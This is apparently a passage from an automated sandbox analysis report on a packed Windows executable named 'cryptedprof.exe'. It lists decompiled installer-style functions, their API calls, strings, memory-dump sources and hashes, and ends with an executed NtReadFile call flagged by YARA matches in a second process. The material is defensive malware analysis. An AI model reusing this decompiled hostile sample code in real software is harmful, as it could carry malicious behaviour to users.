                                                                                        					}
                                                                                        					if(_t51 < 0xffff3333) {
                                                                                        						_t50 = 0x14;
                                                                                        						asm("cdq");
                                                                                        						_t22 = 1 / _t50 + _t51;
                                                                                        					}
                                                                                        					_t23 = _t22 & 0x00ffffff;
                                                                                        					_t53 = _t22 >> 0;
                                                                                        					_t43 = 0xa;
                                                                                        					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                                                        				} else {
                                                                                        					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                                                        					_t47 = 0;
                                                                                        				}
                                                                                        				_t29 = E004062E0(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                                                        				_t31 = E004062E0(_t41, _t47, _t53,  &_v68, _t41);
                                                                                        				_t32 = E004062E0(_t41, _t47, 0x42a8b8, 0x42a8b8, _a8);
                                                                                        				wsprintfA(_t32 + lstrlenA(0x42a8b8), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                                                        				return SetDlgItemTextA( *0x42ec18, _a4, 0x42a8b8);
                                                                                        			}




















                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
                                                                                        • wsprintfA.USER32 ref: 00404BC0
                                                                                        • SetDlgItemTextA.USER32 ref: 00404BD3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                        • String ID: %u.%u%s%s
                                                                                        • API String ID: 3540041739-3551169577
                                                                                        • Opcode ID: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
                                                                                        • Instruction ID: 2e00c39cbbb7080f6c78f9bc89fda30cce30f66f6b884b1aab771d4f97bc656b
                                                                                        • Opcode Fuzzy Hash: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
                                                                                        • Instruction Fuzzy Hash: 9111B7736041282BDB00656D9C42FAE3298DB85374F25027BFA26F71D1EA79DC2242ED
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 59%
                                                                                        			E00401C2E(intOrPtr __edx) {
                                                                                        				int _t29;
                                                                                        				long _t30;
                                                                                        				signed int _t32;
                                                                                        				CHAR* _t35;
                                                                                        				long _t36;
                                                                                        				int _t41;
                                                                                        				signed int _t42;
                                                                                        				int _t46;
                                                                                        				int _t56;
                                                                                        				intOrPtr _t57;
                                                                                        				struct HWND__* _t61;
                                                                                        				void* _t64;
                                                                                        
                                                                                        				_t57 = __edx;
                                                                                        				_t29 = E00402BAC(3);
                                                                                        				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                        				 *(_t64 - 8) = _t29;
                                                                                        				_t30 = E00402BAC(4);
                                                                                        				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                        				 *(_t64 + 8) = _t30;
                                                                                        				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                                                                        					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
                                                                                        				}
                                                                                        				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                                                                        				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                                                                        					 *(_t64 + 8) = E00402BCE(0x44);
                                                                                        				}
                                                                                        				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                                                                        				_push(1);
                                                                                        				if(__eflags != 0) {
                                                                                        					_t59 = E00402BCE();
                                                                                        					_t32 = E00402BCE();
                                                                                        					asm("sbb ecx, ecx");
                                                                                        					asm("sbb eax, eax");
                                                                                        					_t35 =  ~( *_t31) & _t59;
                                                                                        					__eflags = _t35;
                                                                                        					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                                        					goto L10;
                                                                                        				} else {
                                                                                        					_t61 = E00402BAC();
                                                                                        					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                        					_t41 = E00402BAC(2);
                                                                                        					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                        					_t56 =  *(_t64 - 0x14) >> 2;
                                                                                        					if(__eflags == 0) {
                                                                                        						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
                                                                                        						L10:
                                                                                        						 *(_t64 - 0xc) = _t36;
                                                                                        					} else {
                                                                                        						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
                                                                                        						asm("sbb eax, eax");
                                                                                        						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                                        					}
                                                                                        				}
                                                                                        				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                                                                        				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                                                                        					_push( *(_t64 - 0xc));
                                                                                        					E004061AB();
                                                                                        				}
                                                                                        				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t64 - 4));
                                                                                        				return 0;
                                                                                        			}
















                                                                                        APIs
                                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Timeout
                                                                                        • String ID: !
                                                                                        • API String ID: 1777923405-2657877971
                                                                                        • Opcode ID: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
                                                                                        • Instruction ID: c2b49ebb6df65f965b847d27db55c839bb0ece9d55d01ae65463d35699866107
                                                                                        • Opcode Fuzzy Hash: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
                                                                                        • Instruction Fuzzy Hash: 1B215E71A44208BEEB05AFB5D98AAAD7FB5EF44304F20447EF502B61D1D6B88541DB28
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00405BE5(CHAR* _a4) {
                                                                                        				CHAR* _t7;
                                                                                        
                                                                                        				_t7 = _a4;
                                                                                        				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                                        					lstrcatA(_t7, 0x40a014);
                                                                                        				}
                                                                                        				return _t7;
                                                                                        			}





                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403473,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BEB
                                                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403473,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BF4
                                                                                        • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405C05
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BE5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                        • API String ID: 2659869361-3936084776
                                                                                        • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                        • Instruction ID: 4aa12e920610aceb8e029670fdf9df43119f1a02786e7ce54b96f7a39d5643bc
                                                                                        • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                        • Instruction Fuzzy Hash: E3D0A762A09630BAD20136655C09DCB19088F12701B05006BF101B2191C73C4C5147FD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E0040396E() {
                                                                                        				void* _t1;
                                                                                        				void* _t2;
                                                                                        				signed int _t11;
                                                                                        
                                                                                        				_t1 =  *0x40a018; // 0x2c8
                                                                                        				if(_t1 != 0xffffffff) {
                                                                                        					CloseHandle(_t1);
                                                                                        					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                                                        				}
                                                                                        				_t2 =  *0x40a01c; // 0x2a8
                                                                                        				if(_t2 != 0xffffffff) {
                                                                                        					CloseHandle(_t2);
                                                                                        					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                                                                        					_t11 =  *0x40a01c;
                                                                                        				}
                                                                                        				E004039CB();
                                                                                        				return E00405A15(_t11, "C:\\Users\\engineer\\AppData\\Local\\Temp\\nsl227.tmp", 7);
                                                                                        			}







                                                                                        APIs
                                                                                        • CloseHandle.KERNEL32(000002C8,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403980
                                                                                        • CloseHandle.KERNEL32(000002A8,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403994
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp\nsl227.tmp, xrefs: 004039A4
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403973
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsl227.tmp
                                                                                        • API String ID: 2962429428-1875756518
                                                                                        • Opcode ID: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
                                                                                        • Instruction ID: e02401a4112a94a9765f7fc85388a0ec9ec9dd0d4867be743f4f38008bc29606
                                                                                        • Opcode Fuzzy Hash: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
                                                                                        • Instruction Fuzzy Hash: 36E08C71910714A6C124AF7CAE8E8853B285B893357208726F078F20F0C7789AA74EAD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 89%
                                                                                        			E004052E8(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                        				int _t15;
                                                                                        				long _t16;
                                                                                        
                                                                                        				_t15 = _a8;
                                                                                        				if(_t15 != 0x102) {
                                                                                        					if(_t15 != 0x200) {
                                                                                        						_t16 = _a16;
                                                                                        						L7:
                                                                                        						if(_t15 == 0x419 &&  *0x42a8a4 != _t16) {
                                                                                        							_push(_t16);
                                                                                        							_push(6);
                                                                                        							 *0x42a8a4 = _t16;
                                                                                        							E00404CA4();
                                                                                        						}
                                                                                        						L11:
                                                                                        						return CallWindowProcA( *0x42a8ac, _a4, _t15, _a12, _t16);
                                                                                        					}
                                                                                        					if(IsWindowVisible(_a4) == 0) {
                                                                                        						L10:
                                                                                        						_t16 = _a16;
                                                                                        						goto L11;
                                                                                        					}
                                                                                        					_t16 = E00404C24(_a4, 1);
                                                                                        					_t15 = 0x419;
                                                                                        					goto L7;
                                                                                        				}
                                                                                        				if(_a12 != 0x20) {
                                                                                        					goto L10;
                                                                                        				}
                                                                                        				E0040431D(0x413);
                                                                                        				return 0;
                                                                                        			}






                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 00405317
                                                                                        • CallWindowProcA.USER32 ref: 00405368
                                                                                          • Part of subcall function 0040431D: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0040432F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                        • String ID:
                                                                                        • API String ID: 3748168415-3916222277
                                                                                        • Opcode ID: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
                                                                                        • Instruction ID: 61c005e653dc5e4fe91c717b668e6c159ed787b7c92b66bd7724375ff0c78d11
                                                                                        • Opcode Fuzzy Hash: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
                                                                                        • Instruction Fuzzy Hash: B5018471200608EFDF206F11DD80AAB3765EB84795F185137FE047A1D1C7BA8C629E2E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 90%
                                                                                        			E00406134(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
                                                                                        				int _v8;
                                                                                        				long _t21;
                                                                                        				long _t24;
                                                                                        				char* _t30;
                                                                                        
                                                                                        				asm("sbb eax, eax");
                                                                                        				_v8 = 0x400;
                                                                                        				_t21 = E004060D3(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                                                        				_t30 = _a16;
                                                                                        				if(_t21 != 0) {
                                                                                        					L4:
                                                                                        					 *_t30 =  *_t30 & 0x00000000;
                                                                                        				} else {
                                                                                        					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                                                        					_t21 = RegCloseKey(_a20);
                                                                                        					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
                                                                                        					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                        						goto L4;
                                                                                        					}
                                                                                        				}
                                                                                        				return _t21;
                                                                                        			}








                                                                                        APIs
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,0042A098,?,?,?,00000002,Call,?,004063E9,80000002), ref: 0040617A
                                                                                        • RegCloseKey.ADVAPI32(?,?,004063E9,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A098), ref: 00406185
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: CloseQueryValue
                                                                                        • String ID: Call
                                                                                        • API String ID: 3356406503-1824292864
                                                                                        • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                        • Instruction ID: abb308f8f7f3d79eba5fb0d9b58611e130e20d6dfe1a02acdbc1ca07f32112a5
                                                                                        • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                        • Instruction Fuzzy Hash: CA01BC72500209ABEF22CF60CD09FDB3FA8EF45364F01403AF916E6191D278C964CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004058EC(CHAR* _a4) {
                                                                                        				struct _PROCESS_INFORMATION _v20;
                                                                                        				int _t7;
                                                                                        
                                                                                        				0x42c0c0->cb = 0x44;
                                                                                        				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c0c0,  &_v20);
                                                                                        				if(_t7 != 0) {
                                                                                        					CloseHandle(_v20.hThread);
                                                                                        					return _v20.hProcess;
                                                                                        				}
                                                                                        				return _t7;
                                                                                        			}






                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C0C0,Error launching installer), ref: 00405915
                                                                                        • CloseHandle.KERNEL32(?), ref: 00405922
                                                                                        Strings
                                                                                        • Error launching installer, xrefs: 004058FF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: CloseCreateHandleProcess
                                                                                        • String ID: Error launching installer
                                                                                        • API String ID: 3712363035-66219284
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00405C2C(char* _a4) {
                                                                                        				char* _t3;
                                                                                        				char* _t5;
                                                                                        
                                                                                        				_t5 = _a4;
                                                                                        				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                                                        				while( *_t3 != 0x5c) {
                                                                                        					_t3 = CharPrevA(_t5, _t3);
                                                                                        					if(_t3 > _t5) {
                                                                                        						continue;
                                                                                        					}
                                                                                        					break;
                                                                                        				}
                                                                                        				 *_t3 =  *_t3 & 0x00000000;
                                                                                        				return  &(_t3[1]);
                                                                                        			}






                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\cryptedprof.exe,C:\Users\user\Desktop\cryptedprof.exe,80000000,00000003), ref: 00405C32
                                                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\cryptedprof.exe,C:\Users\user\Desktop\cryptedprof.exe,80000000,00000003), ref: 00405C40
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: CharPrevlstrlen
                                                                                        • String ID: C:\Users\user\Desktop
                                                                                        • API String ID: 2709904686-3125694417
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E709910E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                        				char* _t17;
                                                                                        				char _t19;
                                                                                        				void* _t20;
                                                                                        				void* _t24;
                                                                                        				void* _t27;
                                                                                        				void* _t31;
                                                                                        				void* _t37;
                                                                                        				void* _t39;
                                                                                        				void* _t40;
                                                                                        				signed int _t43;
                                                                                        				void* _t52;
                                                                                        				char* _t53;
                                                                                        				char* _t55;
                                                                                        				void* _t56;
                                                                                        				void* _t58;
                                                                                        
                                                                                        				 *0x7099405c = _a8;
                                                                                        				 *0x70994060 = _a16;
                                                                                        				 *0x70994064 = _a12;
                                                                                        				 *((intOrPtr*)(_a20 + 0xc))( *0x70994038, E70991556, _t52);
                                                                                        				_t43 =  *0x7099405c +  *0x7099405c * 4 << 2;
                                                                                        				_t17 = E7099123B();
                                                                                        				_a8 = _t17;
                                                                                        				_t53 = _t17;
                                                                                        				if( *_t17 == 0) {
                                                                                        					L16:
                                                                                        					return GlobalFree(_a8);
                                                                                        				} else {
                                                                                        					do {
                                                                                        						_t19 =  *_t53;
                                                                                        						_t55 = _t53 + 1;
                                                                                        						_t58 = _t19 - 0x6c;
                                                                                        						if(_t58 > 0) {
                                                                                        							_t20 = _t19 - 0x70;
                                                                                        							if(_t20 == 0) {
                                                                                        								L12:
                                                                                        								_t53 = _t55 + 1;
                                                                                        								_t24 = E70991266(E709912AD( *_t55 - 0x30));
                                                                                        								L13:
                                                                                        								GlobalFree(_t24);
                                                                                        								goto L14;
                                                                                        							}
                                                                                        							_t27 = _t20;
                                                                                        							if(_t27 == 0) {
                                                                                        								L10:
                                                                                        								_t53 = _t55 + 1;
                                                                                        								_t24 = E709912D1( *_t55 - 0x30, E7099123B());
                                                                                        								goto L13;
                                                                                        							}
                                                                                        							L7:
                                                                                        							if(_t27 == 1) {
                                                                                        								_t31 = GlobalAlloc(0x40, _t43 + 4);
                                                                                        								 *_t31 =  *0x70994030;
                                                                                        								 *0x70994030 = _t31;
                                                                                        								E70991508(_t31 + 4,  *0x70994064, _t43);
                                                                                        								_t56 = _t56 + 0xc;
                                                                                        							}
                                                                                        							goto L14;
                                                                                        						}
                                                                                        						if(_t58 == 0) {
                                                                                        							L17:
                                                                                        							_t34 =  *0x70994030;
                                                                                        							if( *0x70994030 != 0) {
                                                                                        								E70991508( *0x70994064, _t34 + 4, _t43);
                                                                                        								_t37 =  *0x70994030;
                                                                                        								_t56 = _t56 + 0xc;
                                                                                        								GlobalFree(_t37);
                                                                                        								 *0x70994030 =  *_t37;
                                                                                        							}
                                                                                        							goto L14;
                                                                                        						}
                                                                                        						_t39 = _t19 - 0x4c;
                                                                                        						if(_t39 == 0) {
                                                                                        							goto L17;
                                                                                        						}
                                                                                        						_t40 = _t39 - 4;
                                                                                        						if(_t40 == 0) {
                                                                                        							 *_t55 =  *_t55 + 0xa;
                                                                                        							goto L12;
                                                                                        						}
                                                                                        						_t27 = _t40;
                                                                                        						if(_t27 == 0) {
                                                                                        							 *_t55 =  *_t55 + 0xa;
                                                                                        							goto L10;
                                                                                        						}
                                                                                        						goto L7;
                                                                                        						L14:
                                                                                        					} while ( *_t53 != 0);
                                                                                        					goto L16;
                                                                                        				}
                                                                                        			}



















                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336061251.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true
                                                                                        • Associated: 00000001.00000002.336043646.0000000070990000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.336078624.0000000070993000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.336140762.0000000070995000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Global$Free$Alloc
                                                                                        • String ID:
                                                                                        • API String ID: 1780285237-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00405D4B(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                        				int _v8;
                                                                                        				int _t12;
                                                                                        				int _t14;
                                                                                        				int _t15;
                                                                                        				CHAR* _t17;
                                                                                        				CHAR* _t27;
                                                                                        
                                                                                        				_t12 = lstrlenA(_a8);
                                                                                        				_t27 = _a4;
                                                                                        				_v8 = _t12;
                                                                                        				while(lstrlenA(_t27) >= _v8) {
                                                                                        					_t14 = _v8;
                                                                                        					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                        					_t15 = lstrcmpiA(_t27, _a8);
                                                                                        					_t27[_v8] =  *(_t14 + _t27);
                                                                                        					if(_t15 == 0) {
                                                                                        						_t17 = _t27;
                                                                                        					} else {
                                                                                        						_t27 = CharNextA(_t27);
                                                                                        						continue;
                                                                                        					}
                                                                                        					L5:
                                                                                        					return _t17;
                                                                                        				}
                                                                                        				_t17 = 0;
                                                                                        				goto L5;
                                                                                        			}










                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D73
                                                                                        • CharNextA.USER32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D84
                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 190613189-0
                                                                                        • Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                                                        • Instruction ID: 0c063e539c4a2d6313fdce3eb9328f18231664df77b923cface8765f2046746d
                                                                                        • Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                                                        • Instruction Fuzzy Hash: 0AF0F632104914FFCB02DFA4DD04D9FBBA8EF46350B2580BAE840F7220D634DE019BA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Executed Functions

                                                                                        APIs
                                                                                        • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID: BMA$BMA
                                                                                        • API String ID: 2738559852-2163208940
                                                                                        • Opcode ID: e057cf46ccd3db2b722e5824745a7725a82f531d19f825803eea8a1e84552030
                                                                                        • Instruction ID: 4f69a3f11c1cce54d2c57a6e5244db96d48f95c1903781e266c5d2f7246d4c1c
                                                                                        • Opcode Fuzzy Hash: e057cf46ccd3db2b722e5824745a7725a82f531d19f825803eea8a1e84552030
